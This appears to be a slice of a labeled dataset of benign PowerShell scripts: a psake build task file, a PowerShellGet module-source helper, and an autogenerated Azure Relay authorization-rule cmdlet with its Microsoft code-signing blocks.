Nj3N4X4Gkw0xk7zji0zmuZzMeWT4UKsp162sEtFmHWeocFDQOoJWiqLIc1wgj5g7 # IxWhZRmTIM9BsG2rQIPfCLLv1J+OVHbD7ZyMN4S39WRG+NZZDSsiA5JVB75c4BkK # PuiR0fYiZTOKVroiXMO+FxfBCAR0/5FSidXJ9/J5WDonWi6Ti2l9tEt9ZGAwe+Ta # LwfhOSadLbBiBhD+PIiYvkLI3F+8lblwAzrmNTISh/8Pa4mxtbwwJc2JoyAqBW2p # EpuW8xnGK1igu0TPkhFjK/9HsT3jfOFUPHvctM+ZrUO+q18d4Ffa2uHrotgAFRRq # FUaYagVi5QVLmuj3Hc6EDFkfVPMTlI8Oo5EaFdukiijvF+ax3DeTDSlB/GnChLpa # Jz3sJuxsoFOcR1pq7AWpTSc7lEtkEudx8KSYpOVw9UVU0u7B5eafiWwPlzm6GjWr # 2PWd2mymWqsWFQyYR8xdKJEMYHfba2c7LqXr2QHPyGwRcl4Xt4NbiSbqbBwfo7oF # 7MC85dIwWHE2lC8dWZZIbVHP1nKD+0tgn3Lnjkk05VXayByQnwmYGySTpE1soUOW # WE65ht9gUMAc0L0VL6ohMKmhudKARwMw0id86MdJEH6Jj7f6zpqQMK+TlpNrhgCx # iM0NBQgN # SIG # End signature block
combined_dataset/train/non-malicious/2939.ps1
2939.ps1
task default -depends Test task Test -depends Compile, Clean -PreAction {"Pre-Test"} -Action { Assert $false "This fails." } -PostAction {"Post-Test"} task Compile -depends Clean { "Compile" } task Clean { "Clean" }
combined_dataset/train/non-malicious/4410.ps1
4410.ps1
function Set-ModuleSourcesVariable { [CmdletBinding()] param( [switch] $Force, $Proxy, $ProxyCredential ) if(-not $script:PSGetModuleSources -or $Force) { $isPersistRequired = $false if(Microsoft.PowerShell.Management\Test-Path $script:PSGetModuleSourcesFilePath) { $script:PSGetModuleSources = DeSerialize-PSObject -Path $script:PSGetModuleSourcesFilePath } else { $script:PSGetModuleSources = [ordered]@{} if(-not $script:PSGetModuleSources.Contains($Script:PSGalleryModuleSource)) { $null = Set-PSGalleryRepository -Proxy $Proxy -ProxyCredential $ProxyCredential } } $script:PSGetModuleSources.Keys | Microsoft.PowerShell.Core\ForEach-Object { $moduleSource = $script:PSGetModuleSources[$_] if(-not (Get-Member -InputObject $moduleSource -Name $script:ScriptSourceLocation)) { $scriptSourceLocation = Get-ScriptSourceLocation -Location $moduleSource.SourceLocation -Proxy $Proxy -ProxyCredential $ProxyCredential Microsoft.PowerShell.Utility\Add-Member -InputObject $script:PSGetModuleSources[$_] ` -MemberType NoteProperty ` -Name $script:ScriptSourceLocation ` -Value $scriptSourceLocation if(Get-Member -InputObject $moduleSource -Name $script:PublishLocation) { if(-not $moduleSource.PublishLocation) { $script:PSGetModuleSources[$_].PublishLocation = Get-PublishLocation -Location $moduleSource.SourceLocation } Microsoft.PowerShell.Utility\Add-Member -InputObject $script:PSGetModuleSources[$_] ` -MemberType NoteProperty ` -Name $script:ScriptPublishLocation ` -Value $moduleSource.PublishLocation } $isPersistRequired = $true } } if($isPersistRequired) { Save-ModuleSources } } }
combined_dataset/train/non-malicious/sample_25_83.ps1
sample_25_83.ps1
# ---------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Code generated by Microsoft (R) AutoRest Code Generator.Changes may cause incorrect behavior and will be lost if the code # is regenerated. # ---------------------------------------------------------------------------------- <# .Synopsis Authorization rule for a namespace by name. .Description Authorization rule for a namespace by name. .Example {{ Add code here }} .Example {{ Add code here }} .Inputs Microsoft.Azure.PowerShell.Cmdlets.Relay.Models.IRelayIdentity .Outputs Microsoft.Azure.PowerShell.Cmdlets.Relay.Models.Api20211101.IAuthorizationRule .Notes COMPLEX PARAMETER PROPERTIES To create the parameters described below, construct a hash table containing the appropriate properties. For information on hash tables, run Get-Help about_Hash_Tables. INPUTOBJECT <IRelayIdentity>: Identity Parameter [AuthorizationRuleName <String>]: The authorization rule name. [HybridConnectionName <String>]: The hybrid connection name. [Id <String>]: Resource identity path [NamespaceName <String>]: The namespace name [PrivateEndpointConnectionName <String>]: The PrivateEndpointConnection name [PrivateLinkResourceName <String>]: The PrivateLinkResource name [RelayName <String>]: The relay name. [ResourceGroupName <String>]: Name of the Resource group within the Azure subscription. [SubscriptionId <String>]: Subscription credentials which uniquely identify the Microsoft Azure subscription. The subscription ID forms part of the URI for every service call. .Link https://learn.microsoft.com/powershell/module/az.relay/get-azrelayauthorizationrule #> function Get-AzRelayAuthorizationRule { [OutputType([Microsoft.Azure.PowerShell.Cmdlets.Relay.Models.Api20211101.IAuthorizationRule])] [CmdletBinding(DefaultParameterSetName='List', PositionalBinding=$false)] param( [Parameter(ParameterSetName='Get', Mandatory)] [Parameter(ParameterSetName='Get1', Mandatory)] [Parameter(ParameterSetName='Get2', Mandatory)] [Alias('AuthorizationRuleName')] [Microsoft.Azure.PowerShell.Cmdlets.Relay.Category('Path')] [System.String] # The authorization rule name. ${Name}, [Parameter(ParameterSetName='Get', Mandatory)] [Parameter(ParameterSetName='Get1', Mandatory)] [Parameter(ParameterSetName='Get2', Mandatory)] [Parameter(ParameterSetName='List', Mandatory)] [Parameter(ParameterSetName='List1', Mandatory)] [Parameter(ParameterSetName='List2', Mandatory)] [Microsoft.Azure.PowerShell.Cmdlets.Relay.Category('Path')] [System.String] # The namespace name ${Namespace}, [Parameter(ParameterSetName='Get', Mandatory)] [Parameter(ParameterSetName='Get1', Mandatory)] [Parameter(ParameterSetName='Get2', Mandatory)] [Parameter(ParameterSetName='List', Mandatory)] [Parameter(ParameterSetName='List1', Mandatory)] [Parameter(ParameterSetName='List2', Mandatory)] [Microsoft.Azure.PowerShell.Cmdlets.Relay.Category('Path')] [System.String] # Name of the Resource group within the Azure subscription. ${ResourceGroupName}, [Parameter(ParameterSetName='Get')] [Parameter(ParameterSetName='Get1')] [Parameter(ParameterSetName='Get2')] [Parameter(ParameterSetName='List')] [Parameter(ParameterSetName='List1')] [Parameter(ParameterSetName='List2')] [Microsoft.Azure.PowerShell.Cmdlets.Relay.Category('Path')] [Microsoft.Azure.PowerShell.Cmdlets.Relay.Runtime.DefaultInfo(Script='(Get-AzContext).Subscription.Id')] [System.String[]] # Subscription credentials which uniquely identify the Microsoft Azure subscription. # The subscription ID forms part of the URI for every service call. ${SubscriptionId}, [Parameter(ParameterSetName='Get1', Mandatory)] [Parameter(ParameterSetName='List1', Mandatory)] [Microsoft.Azure.PowerShell.Cmdlets.Relay.Category('Path')] [System.String] # The hybrid connection name. ${HybridConnection}, [Parameter(ParameterSetName='Get2', Mandatory)] [Parameter(ParameterSetName='List2', Mandatory)] [Microsoft.Azure.PowerShell.Cmdlets.Relay.Category('Path')] [System.String] # The relay name. ${WcfRelay}, [Parameter(ParameterSetName='GetViaIdentity', Mandatory, ValueFromPipeline)] [Microsoft.Azure.PowerShell.Cmdlets.Relay.Category('Path')] [Microsoft.Azure.PowerShell.Cmdlets.Relay.Models.IRelayIdentity] # Identity Parameter # To construct, see NOTES section for INPUTOBJECT properties and create a hash table. ${InputObject}, [Parameter()] [Alias('AzureRMContext', 'AzureCredential')] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.Relay.Category('Azure')] [System.Management.Automation.PSObject] # The credentials, account, tenant, and subscription used for communication with Azure. ${DefaultProfile}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.Relay.Category('Runtime')] [System.Management.Automation.SwitchParameter] # Wait for .NET debugger to attach ${Break}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.Relay.Category('Runtime')] [Microsoft.Azure.PowerShell.Cmdlets.Relay.Runtime.SendAsyncStep[]] # SendAsync Pipeline Steps to be appended to the front of the pipeline ${HttpPipelineAppend}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.Relay.Category('Runtime')] [Microsoft.Azure.PowerShell.Cmdlets.Relay.Runtime.SendAsyncStep[]] # SendAsync Pipeline Steps to be prepended to the front of the pipeline ${HttpPipelinePrepend}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.Relay.Category('Runtime')] [System.Uri] # The URI for the proxy server to use ${Proxy}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.Relay.Category('Runtime')] [System.Management.Automation.PSCredential] # Credentials for a proxy server to use for the remote call ${ProxyCredential}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.Relay.Category('Runtime')] [System.Management.Automation.SwitchParameter] # Use the default credentials for the proxy ${ProxyUseDefaultCredentials} ) process { try { if (('Get', 'Get1', 'Get2', 'List', 'List1', 'List2') -contains $parameterSet -and -not $PSBoundParameters.ContainsKey('SubscriptionId')) { $PSBoundParameters['SubscriptionId'] = (Get-AzContext).Subscription.Id } $parameterSet = $PSCmdlet.ParameterSetName if ($parameterSet -eq 'List') { Az.Relay.private\Get-AzRelayAuthorizationRule_List @PSBoundParameters } if ($parameterSet -eq 'List1') { Az.Relay.private\Get-AzRelayAuthorizationRule_List1 @PSBoundParameters } if ($parameterSet -eq 'List2') { Az.Relay.private\Get-AzRelayAuthorizationRule_List2 @PSBoundParameters } if ($parameterSet -eq 'Get') { Az.Relay.private\Get-AzRelayAuthorizationRule_Get @PSBoundParameters } if ($parameterSet -eq 'Get1') { Az.Relay.private\Get-AzRelayAuthorizationRule_Get1 @PSBoundParameters } if ($parameterSet -eq 'Get2') { Az.Relay.private\Get-AzRelayAuthorizationRule_Get2 @PSBoundParameters } if ($parameterSet -eq 'GetViaIdentity') { if ($InputObject.Id -ilike '*hybridConnections*') { Az.Relay.private\Get-AzRelayAuthorizationRule_GetViaIdentity1 @PSBoundParameters } elseif ($InputObject.Id -ilike '*wcfRelays*') { Az.Relay.private\Get-AzRelayAuthorizationRule_GetViaIdentity2 @PSBoundParameters } else { Az.Relay.private\Get-AzRelayAuthorizationRule_GetViaIdentity @PSBoundParameters } } } catch { throw } } } # SIG # Begin signature block # MIIoLQYJKoZIhvcNAQcCoIIoHjCCKBoCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCANc20fqH1GSagn # Ur2SP7C0jBY10FJB7Nt14kraJr5nfqCCDXYwggX0MIID3KADAgECAhMzAAADrzBA # DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA # hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG # 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN # xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL # go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB # tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd # mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ # 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY # 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp # XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn # TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT # e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG # OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O # PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk # ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx # HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt # CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGg0wghoJAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIHGfx+DMH1F2H62b+Bh6ozhL # nmIa5/OTV2naxJVlq9/gMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAfuzbuSArOsK5QPY3mg2fMrCFfumK14yaHjZR+2QzfADUT5+Zaf7W4kF1 # iRkU1rUV8k7qprCKDCajKBlSGz0SB0r23rg4waZKbb4Wrm7iRxfj8/5FrAg9fYwk # qDGCn3dgiR/d7w86MM6Mw0HalI+HOruE/dNivEoHF+GwHDINEiscIEN2A0PKpUv7 # KD07np3kFQwefOOrO5XUvtgbq1l6nEeFS/phdr5/x6sNz42ADBQY5Ct6TKpZAlYn # Kv9rs5gy8N8WqV2jqRM+xygxc6BhGgr3zL0wt7BLMUEPQNGLvy70zo1YEiPqB4D8 # DEva1OMYj+bKE+y0TrkCB96tR1fk7KGCF5cwgheTBgorBgEEAYI3AwMBMYIXgzCC # F38GCSqGSIb3DQEHAqCCF3AwghdsAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFSBgsq # hkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCAKpchIEdaaBscLQIK2n3OjiJW7rCI0TELWoxT/fLQQJgIGZhgNl26X # GBMyMDI0MDQyMzEzMTUxMS45NjJaMASAAgH0oIHRpIHOMIHLMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l # cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046MzcwMy0w # NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Wg # ghHtMIIHIDCCBQigAwIBAgITMwAAAeqaJHLVWT9hYwABAAAB6jANBgkqhkiG9w0B # AQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD # VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAeFw0yMzEyMDYxODQ1 # MzBaFw0yNTAzMDUxODQ1MzBaMIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25z # MScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046MzcwMy0wNUUwLUQ5NDcxJTAjBgNV # BAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2UwggIiMA0GCSqGSIb3DQEB # AQUAA4ICDwAwggIKAoICAQC1C1/xSD8gB9X7Ludoo2rWb2ksqaF65QtJkbQpmsc6 # G4bg5MOv6WP/uJ4XOJvKX/c1t0ej4oWBqdGD6VbjXX4T0KfylTulrzKtgxnxZh7q # 1uD0Dy/w5G0DJDPb6oxQrz6vMV2Z3y9ZxjfZqBnDfqGon/4VDHnZhdas22svSC5G # HywsQ2J90MM7L4ecY8TnLI85kXXTVESb09txL2tHMYrB+KHCy08ds36an7IcOGfR # mhHbFoPa5om9YGpVKS8xeT7EAwW7WbXL/lo5p9KRRIjAlsBBHD1TdGBucrGC3TQX # STp9s7DjkvvNFuUa0BKsz6UiCLxJGQSZhd2iOJTEfJ1fxYk2nY6SCKsV+VmtV5ai # PzY/sWoFY542+zzrAPr4elrvr9uB6ci/Kci//EOERZEUTBPXME/ia+t8jrT2y3ug # 15MSCVuhOsNrmuZFwaRCrRED0yz4V9wlMTGHIJW55iNM3HPVJJ19vOSvrCP9lsEc # EwWZIQ1FCyPOnkM1fs7880dahAa5UmPqMk5WEKxzDPVp081X5RQ6HGVUz6ZdgQ0j # cT59EG+CKDPRD6mx8ovzIpS/r/wEHPKt5kOhYrjyQHXc9KHKTWfXpAVj1Syqt5X4 # nr+Mpeubv+N/PjQEPr0iYJDjSzJrqILhBs5pytb6vyR8HUVMp+mAA4rXjOw42vkH # fQIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFCuBRSWiUebpF0BU1MTIcosFblleMB8G # A1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8GA1UdHwRYMFYwVKBSoFCG # Tmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY3JsL01pY3Jvc29mdCUy # MFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBsBggrBgEFBQcBAQRgMF4w # XAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2Vy # dHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3J0MAwG # A1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQD # AgeAMA0GCSqGSIb3DQEBCwUAA4ICAQAog61WXj9+/nxVbX3G37KgvyoNAnuu2w3H # oWZj3H0YCeQ3b9KSZThVThW4iFcHrKnhFMBbXJX4uQI53kOWSaWCaV3xCznpRt3c # 4/gSn3dvO/1GP3MJkpJfgo56CgS9zLOiP31kfmpUdPqekZb4ivMR6LoPb5HNlq0W # bBpzFbtsTjNrTyfqqcqAwc6r99Df2UQTqDa0vzwpA8CxiAg2KlbPyMwBOPcr9hJT # 8sGpX/ZhLDh11dZcbUAzXHo1RJorSSftVa9hLWnzxGzEGafPUwLmoETihOGLqIQl # Cpvr94Hiak0Gq0wY6lduUQjk/lxZ4EzAw/cGMek8J3QdiNS8u9ujYh1B7NLr6t3I # glfScDV3bdVWet1itTUoKVRLIivRDwAT7dRH13Cq32j2JG5BYu/XitRE8cdzaJmD # VBzYhlPl9QXvC+6qR8I6NIN/9914bTq/S4g6FF4f1dixUxE4qlfUPMixGr0Ft4/S # 0P4fwmhs+WHRn62PB4j3zCHixKJCsRn9IR3ExBQKQdMi5auiqB6xQBADUf+F7hSK # ZfbA8sFSFreLSqhvj+qUQF84NcxuaxpbJWVpsO18IL4Qbt45Cz/QMa7EmMGNn7a8 # MM3uTQOlQy0u6c/jq111i1JqMjayTceQZNMBMM5EMc5Dr5m3T4bDj9WTNLgP8SFe # 3EqTaWVMOTCCB3EwggVZoAMCAQICEzMAAAAVxedrngKbSZkAAAAAABUwDQYJKoZI # hvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw # DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x # MjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAy # MDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIyNVowfDELMAkGA1UEBhMC # VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV # BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp # bWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoIC # AQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXIyjVX9gF/bErg4r25Phdg # M/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjoYH1qUoNEt6aORmsHFPPF # dvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6 # GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v3byNpOORj7I5LFGc6XBp # Dco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pGve2krnopN6zL64NF50Zu # yjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viSkR4dPf0gz3N9QZpGdc3E # XzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYrbqgSUei/BQOj0XOmTTd0 # lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1q # GFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSLW6CmgyFdXzB0kZSU2LlQ # +QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AFemzFER1y7435UsSFF5PA # PBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIurQIDAQABo4IB3TCCAdkw # EgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxG # 